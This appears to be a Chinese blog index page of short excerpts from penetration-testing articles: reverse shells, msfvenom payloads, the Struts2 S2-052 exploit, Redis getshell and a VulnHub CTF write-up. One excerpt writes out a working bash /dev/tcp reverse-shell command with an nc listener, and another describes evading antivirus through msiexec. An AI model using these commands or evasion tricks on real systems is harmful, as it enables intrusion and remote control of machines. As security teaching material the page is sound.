天天都在说优化Dockerfile。到底怎么优化,优化后的检验指标又是什么?没有考虑清楚行动目的,隔空放炮,必然徒劳无功。笔者最近准备在CI上增加安全检测,在分析案例样本的时候,找到了比较流行的struts2漏洞,其中S2-052远程代码执行漏洞的利用方式就是在POST请求中添加恶意代码或命令。如Demo片段所示。<command><string>touch</str
分类:
系统相关 时间:
2020-12-25 13:21:15
阅读次数:
0
前言什么是反弹shell(reverseshell)?就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverseshell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。为什么需要反弹shell?反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在*过程中,往往因为端口限制而无法直连目标机
分类:
系统相关 时间:
2020-09-04 17:32:05
阅读次数:
54
一、运行exe程序反弹shell 需要先生成exe木马,然后将exe文件上传到服务器上,最后在服务器上运行该文件。可使用msfvenom生成exe木马。 二、加载dll文件反弹shell 需要先生成dll文件,然后使用regsvr32.exe加载dll。可使用msfvenom生成dll文件。 三、P ...
未授权访问 Date 类型 未授权访问导致getshell 影响范围 复现 (1)shell反弹 (2)结合SSH服务 (3)结合web服务 分析 ...
分类:
数据库 时间:
2019-12-24 23:17:58
阅读次数:
101
0x01 Oracle安装 CentOS 7 安装oracle10g,装了一天,特此记录 oracle9i,10G,11G,各版本下载资源 Centos6/7下静默安装oracle10g 0x02 命令执行 本文测试环境均为: CentOS Linux release 7.2.1511 (Core) ...
分类:
数据库 时间:
2019-10-18 15:57:35
阅读次数:
122
靶机地址: https://www.vulnhub.com/entry/silky-ctf-0x02,307/ 主机扫描: HTTP进行目录爆破 尝试SQL注入会被封掉IP 经过尝试发现username字段存在命令执行的漏洞 我们执行进行shell反弹 http://10.10.202.131/ad ...
分类:
其他好文 时间:
2019-09-21 17:04:26
阅读次数:
123
Msfvenom是有效负载生成和编码的组合。 生成攻击载荷 Linux下反弹Meterpreter shell C反弹shell Python反弹shell Asp反弹shell Bash反弹shell PHP反弹shell Windows反弹shell 64位系统要加x64 Windows提权 第 ...
分类:
其他好文 时间:
2019-08-27 21:30:18
阅读次数:
94
通过使用系统的一些服务进程完成Shell反弹,由于系统进程多数具有微软特征,所以自带免杀,杀毒软件都会默认放行 利用Msiexec进程反弹 Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Updat ...
分类:
其他好文 时间:
2019-08-10 18:58:28
阅读次数:
239
服务器192.168.22.134开启端口监听,监听端口1234nc-lvnp1234++++++++++++++++++++++分割线+++++++++++++++++++++++++++客户机192.168.22.136开启反弹bash-i>&/dev/tcp/192.168.22.134/12340>&1反弹成功,获得客户机的shell
分类:
系统相关 时间:
2017-11-09 15:45:47
阅读次数:
188
bash shell反弹脚本 Python shell 反弹脚本 利用方式,保存成back.sh 或者back.py ,通过远程下载执行即可利用! 借鉴: https://jivoi.github.io/2015/07/01/pentest-tips-and-tricks/ http://pente ...
分类:
系统相关 时间:
2016-12-07 14:02:04
阅读次数:
555
